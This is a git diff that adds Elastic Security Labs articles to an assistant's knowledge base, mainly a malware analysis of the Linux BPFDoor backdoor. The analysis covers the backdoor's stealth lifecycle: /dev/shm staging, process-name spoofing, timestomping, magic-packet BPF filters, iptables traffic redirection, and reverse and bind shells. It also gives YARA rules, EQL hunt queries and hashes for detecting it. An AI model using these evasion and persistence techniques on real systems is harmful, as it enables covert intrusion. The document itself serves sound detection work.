+While observations of supply chain-based attacks or exploitation of vulnerabilities rarely reach this level of global press coverage, Elastic’s observations described in the [2023 Global Threat Report](https://www.elastic.co/explore/security-without-limits/global-threat-report) show that Linux-based signature events continue to grow in our dataset. This growth is partially tied to growth in the systems we observe that report on threat behavior, but it strongly suggests that adversaries are becoming increasingly focused on Linux systems. 
+
+Linux is and will continue to be on the [minds of threat groups](https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor), as its widespread adoption across the internet reinforces its importance. In this case, adversarial groups were trying to circumvent existing controls that would allow for future compromise through other means.
+
+While the objectives of the person(s) behind the XZ backdoor haven’t been made clear yet, it is within the technical capabilities of many threat entities focused on espionage, extortion, destruction of data, intellectual property theft, and human rights abuses. With the ability to execute code on impacted Internet-accessible systems, it’s reasonable to assume that bad actors would further infiltrate victims. Elastic Security Labs sees that Linux visibility has been dramatically improving and enterprises have started to effectively manage their Linux populations, but many organizations reacting to this supply chain compromise are still at the start of that process.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/a_peek_behind_the_bpfdoor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/a_peek_behind_the_bpfdoor.md
new file mode 100644
index 0000000000000..cc70a80f8e04a
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/a_peek_behind_the_bpfdoor.md
@@ -0,0 +1,428 @@
+---
+title: "A peek behind the BPFDoor"
+slug: "a-peek-behind-the-bpfdoor"
+date: "2022-07-13"
+description: "In this research piece, we explore BPFDoor — a backdoor payload specifically crafted for Linux in order to gain re-entry into a previously or actively compromised target environment."
+author:
+  - slug: jake-king
+  - slug: colson-wilhoit
+image: "blog-security-detection-720x420.png"
+category:
+  - slug: attack-pattern
+---
+
+## Preamble
+
+[BPFDoor](https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896) is a backdoor payload specifically crafted for Linux. Its purpose is for long-term persistence in order to gain re-entry into a previously or actively compromised target environment. It notably utilizes BPF along with a number of other techniques to achieve this goal, taking great care to be as efficient and stealthy as possible. PWC researchers discovered this very interesting piece of malware in 2021. PWC attributes this back door to a specific group from China, Red Menshen, and detailed a number of interesting components in a high-level threat research post released [last week](https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf).
+
+PWC’s findings indicated that ​​Red Menshen had focused their efforts on targeting specific Telecommunications, Government, Logistics, and Education groups across the Middle East and Asia. This activity has been across a Monday-to-Friday working period, between 01:00 UTC and 10:00 UTC, indicating that the operators of the malware were consistent in their attacks, and operation during a working week.
+
+Perhaps most concerningly, the payload itself has been observed across the last 5 years in various phases of development and complexity, indicating that the threat actor responsible for operating the malware has been at it for some time, undetected in many environments.
+
+> **BPFDoor Tools**
+>
+> The Elastic Security Team has created a few tools that will aid researchers in analyzing the BPFDoor malware.
+>
+> The BPFDoor scanner will allow you to scan for hosts infected with the BPFDoor malware and the BPFDoor configuration extractor will allow you to extrapolate the malware’s configuration or hardcoded values which can lead to additional observations you can use for further analysis, developing additional signatures or connecting to the backdoor utilizing our client.
+>
+> - [BPFDoor scanner](https://www.elastic.co/security-labs/bpfdoor-scanner)
+> - [BPFDoor configuration extractor](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor)
+
+## Attack Lifecycle
+
+This inherently passive backdoor payload is built to be a form of persistence – a method to regain access if the first or second stage payloads are lost. It is built for and intended to be installed on high-uptime servers or appliances, IoT/SCADA, or cloud systems with access to the Internet. The backdoor usually sits in temporary storage so if a server were to be rebooted or shut down, the backdoor would be lost.
+
+It should be assumed that if this malware is found on a system the initial-access (1st stage) or post-exploitation (2nd stage) payloads are still most likely present and possibly active elsewhere in the environment. This backdoor excels at stealth, taking every opportunity to blend in and remain undetected.
+
+In the below steps, we will break BPFDoor’s actions down according to the vast majority of the samples available.
+
+1. When executed the binary copies itself into /dev/shm/. A temporary filesystem /dev/shm stands for shared memory and is a temporary file storage facility serving as an efficient means of inter-process communication
+2. Renames its process to kdmtmpflush, a hardcoded process name
+3. Initializes itself with the -init flag and forks itself. Forking in Linux means creating a new process by duplicating the calling process
+4. Deletes itself by removing the original binary invoked. The forked process continues to run
+5. Alters the forked processes’ creation and modification time values, also known as [timestomping](https://attack.mitre.org/techniques/T1070/006/)
+6. Creates a new process environment for itself and removes the old one setting (spoofing) a new process name. It changes the way it appears on the system akin to wearing a mask. The process is still kdmtmpflush but if you were to run a ps you would see whatever value it set
+7. Creates a process ID (PID) file in /var/run. PID files are text files containing the process of the associated program meant for preventing multiple starts, marking residency, and used by the program to stop itself. This file resides in /var/run, another temporary file storage facility
+8. Creates a raw network socket. On Linux, a socket is an endpoint for network communication that allows you to specify in detail every section of a packet allowing a user to implement their own transport layer protocol above the internet (IP) level
+9. Sets BPF filters on the raw socket. [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html) allows a user-space program to attach a filter onto any socket and allow or disallow certain types of data to come through the socket
+10. Observes incoming packets
+11. If a packet is observed that matches the BPF filters and contains the required data it is passed to the backdoor for processing
+12. It forks the current process again
+13. Changes the forked processes working directory to /
+14. Changes (spoofs) the name of the forked process to a hardcoded value
+15. Based on the password or existence of a password sent in the “magic packet” the backdoor provides a reverse shell, establishes a bind shell, or sends back a ping
+
+> **Atypical BPFDoor sample**
+>
+> Of note there is one&nbsp;[sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection)&nbsp;we have come across that does not seem to exhibit steps 1 - 4. It doesn’t alter its initial name to a hardcoded value and simply executes from its placed location, otherwise, it models the same behavior.
+
+Below you can see visual representations of the BPFDoor process tree, utilizing Elastic’s Analyzer View. The first image displays the tree prior to active use of the backdoor (i.e reverse shell, bind shell, or pingback) and the second image after a reverse shell has connected and performed post-exploitation activities.
+
+![Elastic Analyzer View of the BPFDoor initial invocation process tree](/assets/images/a-peek-behind-the-bpfdoor/analyzer-view.png)
+
+![Elastic Analyzer View of BPFDoor following a reverse shell connection and post exploitation actions](/assets/images/a-peek-behind-the-bpfdoor/bpfdoor_analyzer.png)
+
+## Defense Evasion Insights
+
+BPFDoor is interesting given the anti-forensics, and obfuscation tactics used. Astute readers will observe slight differences in the PID tree visible when running a ps ajxf on an infected host when compared to executed data within the Analyzer View inside of Elastic. This is due to the process name spoofing mentioned in step 6 (above) of the attack lifecycle above. The image below is taken from a system running BPFDoor with an active reverse shell connection established:
+
+![An observed running process created by the BPFDoor reverse shell](/assets/images/a-peek-behind-the-bpfdoor/observed-process.jpg)
+
+The difference lies in the fact that kdmtmpflush and sh are run prior to spoofing, and are captured at runtime by Elastic Endpoint. This is an accurate representation of the processes active on the host, further confirming the importance of appropriate observation software for Linux hosts - you can’t always trust what you see on the local system:
+
+![Elastic Analyzer View of BPFDoor demonstrating real process capture.](/assets/images/a-peek-behind-the-bpfdoor/analyzer-terminated.jpg)
+
+BPFDoor also holds in its repertoire the ability to subvert the traditional Linux socket client - server architecture in order to hide its malicious traffic. The methods which it utilizes to achieve this are both unusual and intriguing.
+
+The sockets interface is almost synonmous with TCP/IP communication. This simple interface has endured for over 40 years - predating both Linux and Windows implementations.
+
+![Example of how TCP/IP and socket interfaces function](/assets/images/a-peek-behind-the-bpfdoor/tcp-ip.png)
+
+BPFDoor uses a raw socket (as opposed to ‘cooked’ ones that handle IP/TCP/UDP headers transparently) to observe every packet arriving at the machine, ethernet frame headers and all. While this might sound like a stealthy way to intercept traffic, it’s actually not – on any machine with a significant amount of network traffic the CPU usage will be consistently high.
+
+That’s where BPF comes in - an extremely efficient, kernel-level packet filter is the perfect tool to allow the implant to ignore 99% of network traffic and only become activated when a special pattern is encountered. This implant looks for a so-called magic packet in every TCP, UDP and ICMP packet received on the system.
+
+Once activated, a typical reverse shell - which this back door also supports - creates an outbound connection to a listener set up by the attacker. This has the advantage of bypassing firewalls watching inbound traffic only. This method is well-understood by defenders, however. The sneakiest way to get a shell connected would be to reuse an existing packet flow, redirected to a separate process.
+
+In this attack, the initial TCP handshake is done between the attacker and a completely legitimate process – for example nginx or sshd. These handshake packets happen to be also delivered to the backdoor (like every packet on the system) but are filtered out by BPF. Once the connection is established, however, BPFDoor sends a magic packet to the legitimate service. The implant receives it and makes a note of the originating IP and port the attacker is using, and it opens a new listening socket on an inconspicuous port (42391 - 43391).
+
+The implant then reconfigures the firewall to temporarily redirect all traffic from the attacker’s IP/port combination to the new listening socket. The attacker initiates a second TCP handshake on the same legitimate port as before, only now iptables forwards those packets to the listening socket owned by the implant. . This establishes the communication channel between attacker and implant that will be used for command and control. The implant then covers its tracks by removing the iptables firewall rules that redirected the traffic.
+
+Despite the firewall rule being removed, traffic on the legitimate port will continue to be forwarded to the implant due to how Linux statefully tracks connections. No visible traffic will be addressed to the implant port (although it will be delivered there).
+
+![A diagram representing the aforementioned network flows](/assets/images/a-peek-behind-the-bpfdoor/network-flows.png)
+
+## BPF Filters
+
+As stated in step 9 (above), [BPF](https://www.kernel.org/doc/html/v5.12/networking/filter.html) or Berkeley Packet Filters is a technology from the early ’90s that allows a user-space program to attach a network filter onto any socket and allow or disallow certain types of data to come through the socket. These filters are made up of bytecode that runs on an abstract virtual machine in the Linux kernel. The BPF virtual machine has functionality to inspect all parts of incoming packets and make an allow/drop decision based on what it sees. . You can see in the image example below what this looks like within the BPFDoor source code:
+
+![BPFDoor source code BPF Filters](/assets/images/a-peek-behind-the-bpfdoor/bpfdoor-source-code.jpg)
+
+We took this BPF code, converted it, and wrote it up as pseudo code in an effort to aid our research and craft packets able to successfully get through these filters in order to activate the backdoor.
+
+![BPFDoor source code BPF Filter Pseudocode](/assets/images/a-peek-behind-the-bpfdoor/bpf-pseudocode.jpg)
+
+The above capabilities allow BPFDoor to attach a filter onto any socket and allow or disallow certain types of data to come through the socket - used carefully by the adversary to invoke a series of different functions within the payload.
+
+## Historical Analysis
+
+We wanted to see over time, between BPFDoor payloads, what, if anything, the threat actors modified. A number of samples were detonated and analyzed ranging from the uploaded source code to a [sample](https://www.virustotal.com/gui/file/599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683/detection) uploaded last month. We found that the behavior over time did not change a great deal. It maintained the same relative attack lifecycle with a few variations with the hardcoded values such as passwords, process names, and files - this is not uncommon when compared to other malware samples that look to evade detection or leverage payloads across a variety of victims.
+
+We posture that the threat group would change passwords and update process or file names in an effort to improve operational security and remain hidden. It also makes sense that the general functionality of the backdoor would not change in any great way. As the saying goes “If it’s not broken, don’t fix it”. Our malware analysis and reverse engineering team compared the source code (uploaded to [VirusTotal](https://www.virustotal.com/gui/file/8b9db0bc9152628bdacc32dab01590211bee9f27d58e0f66f6a1e26aea7552a6/detection) and found on [Pastebin](https://pastebin.com/raw/kmmJuuQP)) to a recently uploaded sample highlighting some of the notable changes within the main function of the malware in the images below.
+
+![A side by side comparison of the main functions for the Pastebin source code and a sample uploaded to VT last month focusing on the hardcoded string values for the passwords, process names and file name](/assets/images/a-peek-behind-the-bpfdoor/pastebin.jpg)
+
+As we mentioned earlier, one recent [sample](https://www.virustotal.com/gui/file/07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d/detection) we have come across that does not seem to exhibit some of the tactics of prior payloads has been observed - It doesn’t alter its initial name to a hardcoded value and simply executes from its placed location, otherwise, it models relatively the same behavior.
+
+## Linux Malware Sophistication
+
+A trend we have had the privilege of observing at Elastic, is the threat landscape of Linux targeted attacks - these being focused often on cloud workloads, or systems that typically have less observational technology configured in many of the environments we see. The trend of complex, well-designed payloads is something that is often simply overlooked, and specifically in the case of BPFDoor, remained hidden for years.
+
+It is important to consider these workloads a critical component of your security posture: A lack of visibility within cloud workloads will eventually lead to large gaps in security controls - adversarial groups are further growing to understand these trends, and act accordingly. Best practices state that endpoint defenses should be consistent across the fleet of systems under management, and conform to a least privilege architecture.
+
+## Detection of BPFDoor
+
+After researching this malware it became apparent as to why the backdoor remained in use and hidden for so long. If you aren’t intimately familiar with Linux process abnormalities or weren’t looking for it you would generally not detect it. Even though it takes advantage of Linux capabilities in a stealthy manner to evade detection, there are still opportunities for both behavioral and signature-based detections.
+
+The first area of opportunity we witnessed while testing was the behavior we observed during the initial execution of the malware, specifically its working directory, in a shared memory location /dev/shm. This is a native temporary filesystem location in Linux that uses RAM for storage, and a binary executing from it let alone generating network connections is fairly uncommon in practice.
+
+During execution, BPFDoor removes existing files from /dev/shm and copies itself there prior to initialization. A detection for this would be any execution of a binary from this directory as root (you have to be root to write to and read from this directory).
+
+This was verified by detonating the binary in a VM while our Elastic Agent was installed and observing the sequence of events. You can see an image of this detection on the Kibana Security Alerts page below. This rule is publicly available as an Elastic SIEM detection rule - [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml):
+
+![Elastic Alert in Kibana - Binary Executed from Shared Memory Directory](/assets/images/a-peek-behind-the-bpfdoor/Elastic_Alert_in_Kibana_-_Binary_Executed_from_Shared_Memory_Directory.png)
+
+The second opportunity we noticed, for detection, was a specific PID file being created in /var/run. We noticed the dropped PID file was completely empty while doing a quick query via the [Osquery integration](https://docs.elastic.co/en/integrations/osquery_manager) to the /var/run directory. While this is not inherently malicious, it is unusual for the file size of a PID to be 0 or above 10 bytes and thus we created an additional rule centered around detecting this unusual behavior.
+
+Our [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml) rule identifies the creation of a PID file in the main directory of /var/run with no subdirectory, ignoring common PID files to be expected:
+
+![Elastic Alert in Kibana - Abnormal Process ID or Lock File Created](/assets/images/a-peek-behind-the-bpfdoor/abnormal-process.png)
+
+The third area we wanted to look at was the network connections tied to two of the three capabilities (reverse shell and bind shell) the backdoor possesses. We wanted to see if there were any suspicious network connections tied to process or user abnormalities we could sequence together based off of the way BPFDoor handles establishing a reverse or bind shell.
+
+The reverse shell was the first capability focused on. Taking a deep look at the process tree in and around the reverse shell establishment allowed us to key in on what would be considered a strange or even abnormal sequence of events leading to and involving an outbound network connection.
+
+We developed a hunt rule sequence that identifies an outbound network connection attempt followed by a session id change as the root user by the same process entity. The reason we developed these network focused hunt rules is due to possible performance issues caused if running these continually.
+
+The bind shell was the last capability we honed in on. Identifying an abnormal sequence of events surrounding the bind shell connection was difficult due to the way it forks then accepts the connection and kills the accepting process post established connection. Therefore we had to focus on the sequence of events within the process entity id directly involving the network connection and subsequent killing of the accepting process.
+
+After developing the 2 detection rules along with the 2 hunt rules listed below and in addition to the 6 YARA signatures deployed we were able to detect BPFDoor in a myriad of different ways and within different stages of its life cycle. As stated earlier though, if you detect this malware in your environment it should be the least of your concerns given the threat actor will most likely have already successfully compromised your network via other means.
+
+![Elastic Detection Summary of complete BPFDoor attack lifecycle](/assets/images/a-peek-behind-the-bpfdoor/complete-bpfdoor.png)
+
+### Existing Detection Rules
+
+The following Elastic Detection Rules will identify BPFDoor activity:
+
+- [Abnormal Process ID or Lock File Created](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_abnormal_process_id_file_created.toml)
+- [Binary Executed from Shared Memory Directory](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_process_started_in_shared_memory_directory.toml)
+
+### Hunting Queries
+
+This EQL rule can be used to successfully identify BPFDoor reverse shell connections having been established within your environment:
+
+**EQL BPFDoor reverse shell hunt query**
+
+```
+sequence by process.entity_id with maxspan=1m
+[network where event.type == "start" and event.action == "connection_attempted" and user.id == "0" and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd")]
+[process where event.action == "session_id_change" and user.id == "0"]
+```
+
+![Elastic Alert in Kibana - Suspicious Network Connection Attempt by Root](/assets/images/a-peek-behind-the-bpfdoor/attempt-by-root.png)
+
+The hunt rule we created here identifies a sequence of events beginning with a session id change, followed by a network connection accepted, in correlation with ptmx file creation and a deletion of the process responsible for accepting the network connection. This EQL rule can be used to successfully identify BPFDoor bind shell connections within your environment:
+
+**EQL BPFDoor bind shell hunt query**
+
+```
+sequence by process.entity_id with maxspan=1m
+[process where event.type == "change" and event.action == "session_id_change" and user.id == 0 and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd")]
+[network where event.type == "start" and event.action == "connection_accepted" and user.id == 0]
+[file where event.action == "creation" and user.id == 0 and file.path == "/dev/ptmx"]
+[process where event.action == "end" and user.id == 0 and not process.executable : ("/bin/ssh", "/sbin/ssh", "/usr/lib/systemd/systemd")]
+```
+
+![Elastic Alert in Kibana - Suspicious Network Connection Accept by Root](/assets/images/a-peek-behind-the-bpfdoor/Elastic_Alert_in_Kibana_-_Suspicious_Network_Connection_Accept_by_Root.png)
+
+### YARA Rules
+
+In addition to behavioral detection rules in the Elastic Endpoint, we are releasing a set of BPFDoor Yara signatures for the community.
+
+**BPFDoor YARA rule**
+
+```
+rule Linux_Trojan_BPFDoor_1 {
+
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-05-10"
+        last_modified = "2022-05-10"
+        os = "Linux"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BPFDoor"
+        threat_name = "Linux.Trojan.BPFDoor"
+        description = "Detects BPFDoor malware."
+        reference_sample = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3"
+    strings:
+        $a1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
+        $a2 = "/sbin/iptables -t nat -D PREROUTING -p tcp -s %s --dport %d -j REDIRECT --to-ports %d" ascii fullword
+        $a3 = "avahi-daemon: chroot helper" ascii fullword
+        $a4 = "/sbin/mingetty /dev/tty6" ascii fullword
+        $a5 = "ttcompat" ascii fullword
+    condition:
+        all of them
+}
+
+rule Linux_Trojan_BPFDoor_2 {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-05-10"
+        last_modified = "2022-05-10"
+        os = "Linux"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BPFDoor"
+        threat_name = "Linux.Trojan.BPFDoor"
+        description = "Detects BPFDoor malware."
+        reference_sample = "3a1b174f0c19c28f71e1babde01982c56d38d3672ea14d47c35ae3062e49b155"
+    strings:
+        $a1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
+        $a2 = "/sbin/mingetty /dev/tty7" ascii fullword
+        $a3 = "pickup -l -t fifo -u" ascii fullword
+        $a4 = "kdmtmpflush" ascii fullword
+        $a5 = "avahi-daemon: chroot helper" ascii fullword
+        $a6 = "/sbin/auditd -n" ascii fullword
+    condition:
+        all of them
+}
+
+rule Linux_Trojan_BPFDoor_3 {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-05-10"
+        last_modified = "2022-05-10"
+        os = "Linux"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BPFDoor"
+        threat_name = "Linux.Trojan.BPFDoor"
+        description = "Detects BPFDoor malware."
+        reference_sample = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78"
+    strings:
+        $a1 = "[-] Spawn shell failed." ascii fullword
+        $a2 = "[+] Packet Successfuly Sending %d Size." ascii fullword
+        $a3 = "[+] Monitor packet send." ascii fullword
+        $a4 = "[+] Using port %d"
+        $a5 = "decrypt_ctx" ascii fullword
+        $a6 = "getshell" ascii fullword
+        $a7 = "getpassw" ascii fullword
+        $a8 = "export %s=%s" ascii fullword
+    condition:
+        all of them
+}
+
+rule Linux_Trojan_BPFDoor_4 {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-05-10"
+        last_modified = "2022-05-10"
+        os = "Linux"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BPFDoor"
+        threat_name = "Linux.Trojan.BPFDoor"
+        description = "Detects BPFDoor malware."
+        reference_sample = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78"
+    strings:
+        $a1 = { 45 D8 0F B6 10 0F B6 45 FF 48 03 45 F0 0F B6 00 8D 04 02 00 }
+    condition:
+        all of them
+}
+
+rule Linux_Trojan_BPFDoor_5 {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-05-10"
+        last_modified = "2022-05-10"
+        os = "Linux"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BPFDoor"
+        threat_name = "Linux.Trojan.BPFDoor"
+        description = "Detects BPFDoor malware."
+        reference_sample = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
+    strings:
+        $a1 = "getshell" ascii fullword
+        $a2 = "/sbin/agetty --noclear tty1 linux" ascii fullword
+        $a3 = "packet_loop" ascii fullword
+        $a4 = "godpid" ascii fullword
+        $a5 = "ttcompat" ascii fullword
+        $a6 = "decrypt_ctx" ascii fullword
+        $a7 = "rc4_init" ascii fullword
+        $b1 = { D0 48 89 45 F8 48 8B 45 F8 0F B6 40 0C C0 E8 04 0F B6 C0 C1 }
+    condition:
+        all of ($a*) or 1 of ($b*)
+}
+
+rule Linux_Trojan_BPFDoor_6 {
+    meta:
+        Author = "Elastic Security"
+        creation_date = "2022-05-10"
+        last_modified = "2022-05-10"
+        os = "Linux"
+        arch = "x86"
+        category_type = "Trojan"
+        family = "BPFDoor"
+        threat_name = "Linux.Trojan.BPFDoor"
+        description = "Detects BPFDoor malware."
+        reference_sample = "dc8346bf443b7b453f062740d8ae8d8d7ce879672810f4296158f90359dcae3a"
+    strings:
+        $a1 = "getpassw" ascii fullword
+        $a2 = "(udp[8:2]=0x7255) or (icmp[8:2]=0x7255) or (tcp[((tcp[12]&0xf0)>>2):2]=0x5293)" ascii fullword
+        $a3 = "/var/run/haldrund.pid" ascii fullword
+        $a4 = "Couldn't install filter %s: %s" ascii fullword
+        $a5 = "godpid" ascii fullword
+    condition:
+        all of them
+}
+```
+
+## Interacting with BPFDoor
+
+The Elastic Security Team has released several tools that can aid in further research regarding BPFDoor to include a network scanner used to identify infected hosts, a BPFDoor malware configuration extractor, and a BPFDoor client binary that can be used to actively interact with a sample.
+
+### BPFDoor Scanner
+
+The Elastic Security Team [has released](https://www.elastic.co/security-labs/bpfdoor-scanner) a Python script that can identify if you have BPFDoor infected hosts.
+
+The scanner sends a packet to a defined IP address using the default target port (68/UDP)and default interface. It listens to return traffic on port 53/UDP.
+
+![BPFDoor scanner tool](/assets/images/a-peek-behind-the-bpfdoor/BPFDoor_scanner_tool.jpg)
+
+### BPFDoor Configuration Extractor
+
+This tool will allow you to extract configurations from any BPFDoor malware you may have collected. This will allow you to develop additional signatures and further analysis of the malware as well as your environment.
+
+The BPFDoor configuration extractor can be downloaded [here](https://www.elastic.co/security-labs/bpfdoor-configuration-extractor).
+
+![BPFDoor configuration extractor](/assets/images/a-peek-behind-the-bpfdoor/BPFDoor_configuration_extractor.jpg)
+
+### BPFDoor Client POC
+
+Quickly after beginning our research into this malware we realized we would also need to actively interact with BPFDoor in order to observe the full extent of the capabilities that it possesses and monitor what these capabilities would look like from a host and SIEM level.
+
+In order to do this, we had to break down the BPF filters in the BPFDoor source code so we could craft packets for the different protocols. To do this, we used [Scapy](https://scapy.net/), a packet manipulation program, to ensure we could pass the filters for the purpose of activating the backdoor. Once we ensured we could pass the filters, Rhys Rustad-Elliott, an engineer at Elastic built a BPFDoor client that accepts a password, IP address, and port allowing you to connect to a BPFDoor sample and interact if you possess the sample’s hardcoded passwords.
+
+Depending on the password or lack of password provided, BPFDoor will behave exactly the same way it would in the wild. You can invoke a reverse shell, establish a bind shell, or connect to it with no supplied password to receive a ping-back confirming its installation.
+
+![A preview of the BPFDoor Client developed by Elastic Security to assist in research](/assets/images/a-peek-behind-the-bpfdoor/A_preview_of_the_BPFDoor_Client_developed_by_Elastic_Security_to_assist_in_research.jpg)
+
+Researchers looking to use BPFDoor can [reach out to Elastic Security](mailto:threat-notification@elastic.co) for access to the BPFDoor client POC. Please note that these tools will be shared at our discretion with those in the trusted security community looking to improve the detection of this vulnerability.
+
+## Impact
+
+The following MITRE ATT&CK Tactic, Techniques, and Sub-techniques have been observed with the BPFDoor malware.
+
+### Tactics
+
+Tactics represent the “why” of an ATT&CK technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.
+
+- [Execution](https://attack.mitre.org/tactics/TA0002/)
+
+### Techniques (sub-techniques)
+
+Techniques (and sub-techniques) represent ‘how’ an adversary achieves a tactical goal by performing an action.
+
+- [Native API](https://attack.mitre.org/techniques/T1106/)
+- [External Remote Services](https://attack.mitre.org/techniques/T1133/)
+- [Hide Artifacts](https://attack.mitre.org/techniques/T1564/)
+- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)
+- [Non-Application Layer Protocol](https://attack.mitre.org/techniques/T1095/)
+- [Command and Scripting Interpreter: Unix Shell](https://attack.mitre.org/techniques/T1059/004)
+- [Abuse Elevation Control Mechanism: Setuid and Setgid](https://attack.mitre.org/techniques/T1548/001/)
+
+## Source Pseudocode
+
+To clearly articulate the details of this malware, we’ve created [two diagrams](https://www.elastic.co/pdf/bpfdoor_pseudocode.pdf) that outline the specific pseudocode for BPFDoor based on the source code uploaded to VT and found on Pastebin. While this contains a lot of detail, it is simple to understand if researchers choose to further this research.
+
+## Summary
+
+While threat groups continue to increase in maturity, we expect this kind of mature, well designed and hidden threat will continue to be found within Linux environments. These kinds of findings reiterate the importance of comprehensive security controls across the entirety of a fleet, rather than simply focusing on user endpoints.
+
+BPFDoor demonstrates a perfect example of how important monitoring workloads within Linux environments can be. Payloads such as this are near-on impossible to observe and detect without sufficient controls, and should be considered a moving trend within the general adversarial landscape.
+
+## Observables
+
+| Observable                                                       | Type         | Reference            | Note                             |
+| ---------------------------------------------------------------- | ------------ | -------------------- | -------------------------------- |
+| /dev/shm/kdmtmpflush                                             | process name | BPFDoor process name | Observed process name of BPFDoor |
+| /var/run/haldrund.pid                                            | file name    | BPFDoor file name    | Observed BPFDoor PID file        |
+| /var/run/kdevrund.pid                                            | file name    | BPFDoor file name    | Observed BPFDoor PID file        |
+| /var/run/xinetd.lock                                             | file name    | BPFDoor file name    | Observed BPFDoor lock file       |
+| 74ef6cc38f5a1a80148752b63c117e6846984debd2af806c65887195a8eccc56 | SHA-256      | BPFDoor malware      |                                  |
+| 07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d | SHA-256      | BPFDoor malware      |                                  |
+| 76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925 | SHA-256      | BPFDoor malware      |                                  |
+| 93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c | SHA-256      | BPFDoor malware      |                                  |
+| 96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9 | SHA-256      | BPFDoor malware      |                                  |
+| 599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683 | SHA-256      | BPFDoor malware      |                                  |
+| 2e0aa3da45a0360d051359e1a038beff8551b957698f21756cfc6ed5539e4bdb | SHA-256      | BPFDoor malware      |                                  |
+| f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72 | SHA-256      | BPFDoor malware      |                                  |
+| fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a | SHA-256      | BPFDoor malware      |                                  |
+| 5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3 | SHA-256      | BPFDoor malware      |                                  |
+| f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27 | SHA-256      | BPFDoor malware      |                                  |
+| 5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9 | SHA-256      | BPFDoor malware      |                                  |
+| 97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc | SHA-256      | BPFDoor malware      |                                  |
+| c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c | SHA-256      | BPFDoor malware      |                                  |
+| 4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d | SHA-256      | BPFDoor malware      |                                  |
+
+## References
+
+- https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896
+- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf
+- https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group
+
+## Artifacts
+
+Artifacts are also available for [download](https://assets.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt294e7cd5c4b8a050/628e88d93b9b8554904a703c/bpfdoor-indicators.zip) in both ECS and STIX format in a combined zip bundle.
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/accelerating_elastic_detection_tradecraft_with_llms.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/accelerating_elastic_detection_tradecraft_with_llms.md
new file mode 100644
index 0000000000000..3ea1fb2b95eaa
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/accelerating_elastic_detection_tradecraft_with_llms.md
@@ -0,0 +1,83 @@
+---
+title: "Accelerating Elastic detection tradecraft with LLMs"
+slug: "accelerating-elastic-detection-tradecraft-with-llms"
+date: "2023-09-29"
+description: "Learn more about how Elastic Security Labs has been focused on accelerating our detection engineering workflows by tapping into more generative AI capabilities."
+author:
+  - slug: mika-ayenson
+  - slug: jess-daubner
+image: "photo-edited-09@2x.jpg"
+category:
+  - slug: detection-science
+  - slug: machine-learning
+  - slug: generative-ai
+---
+
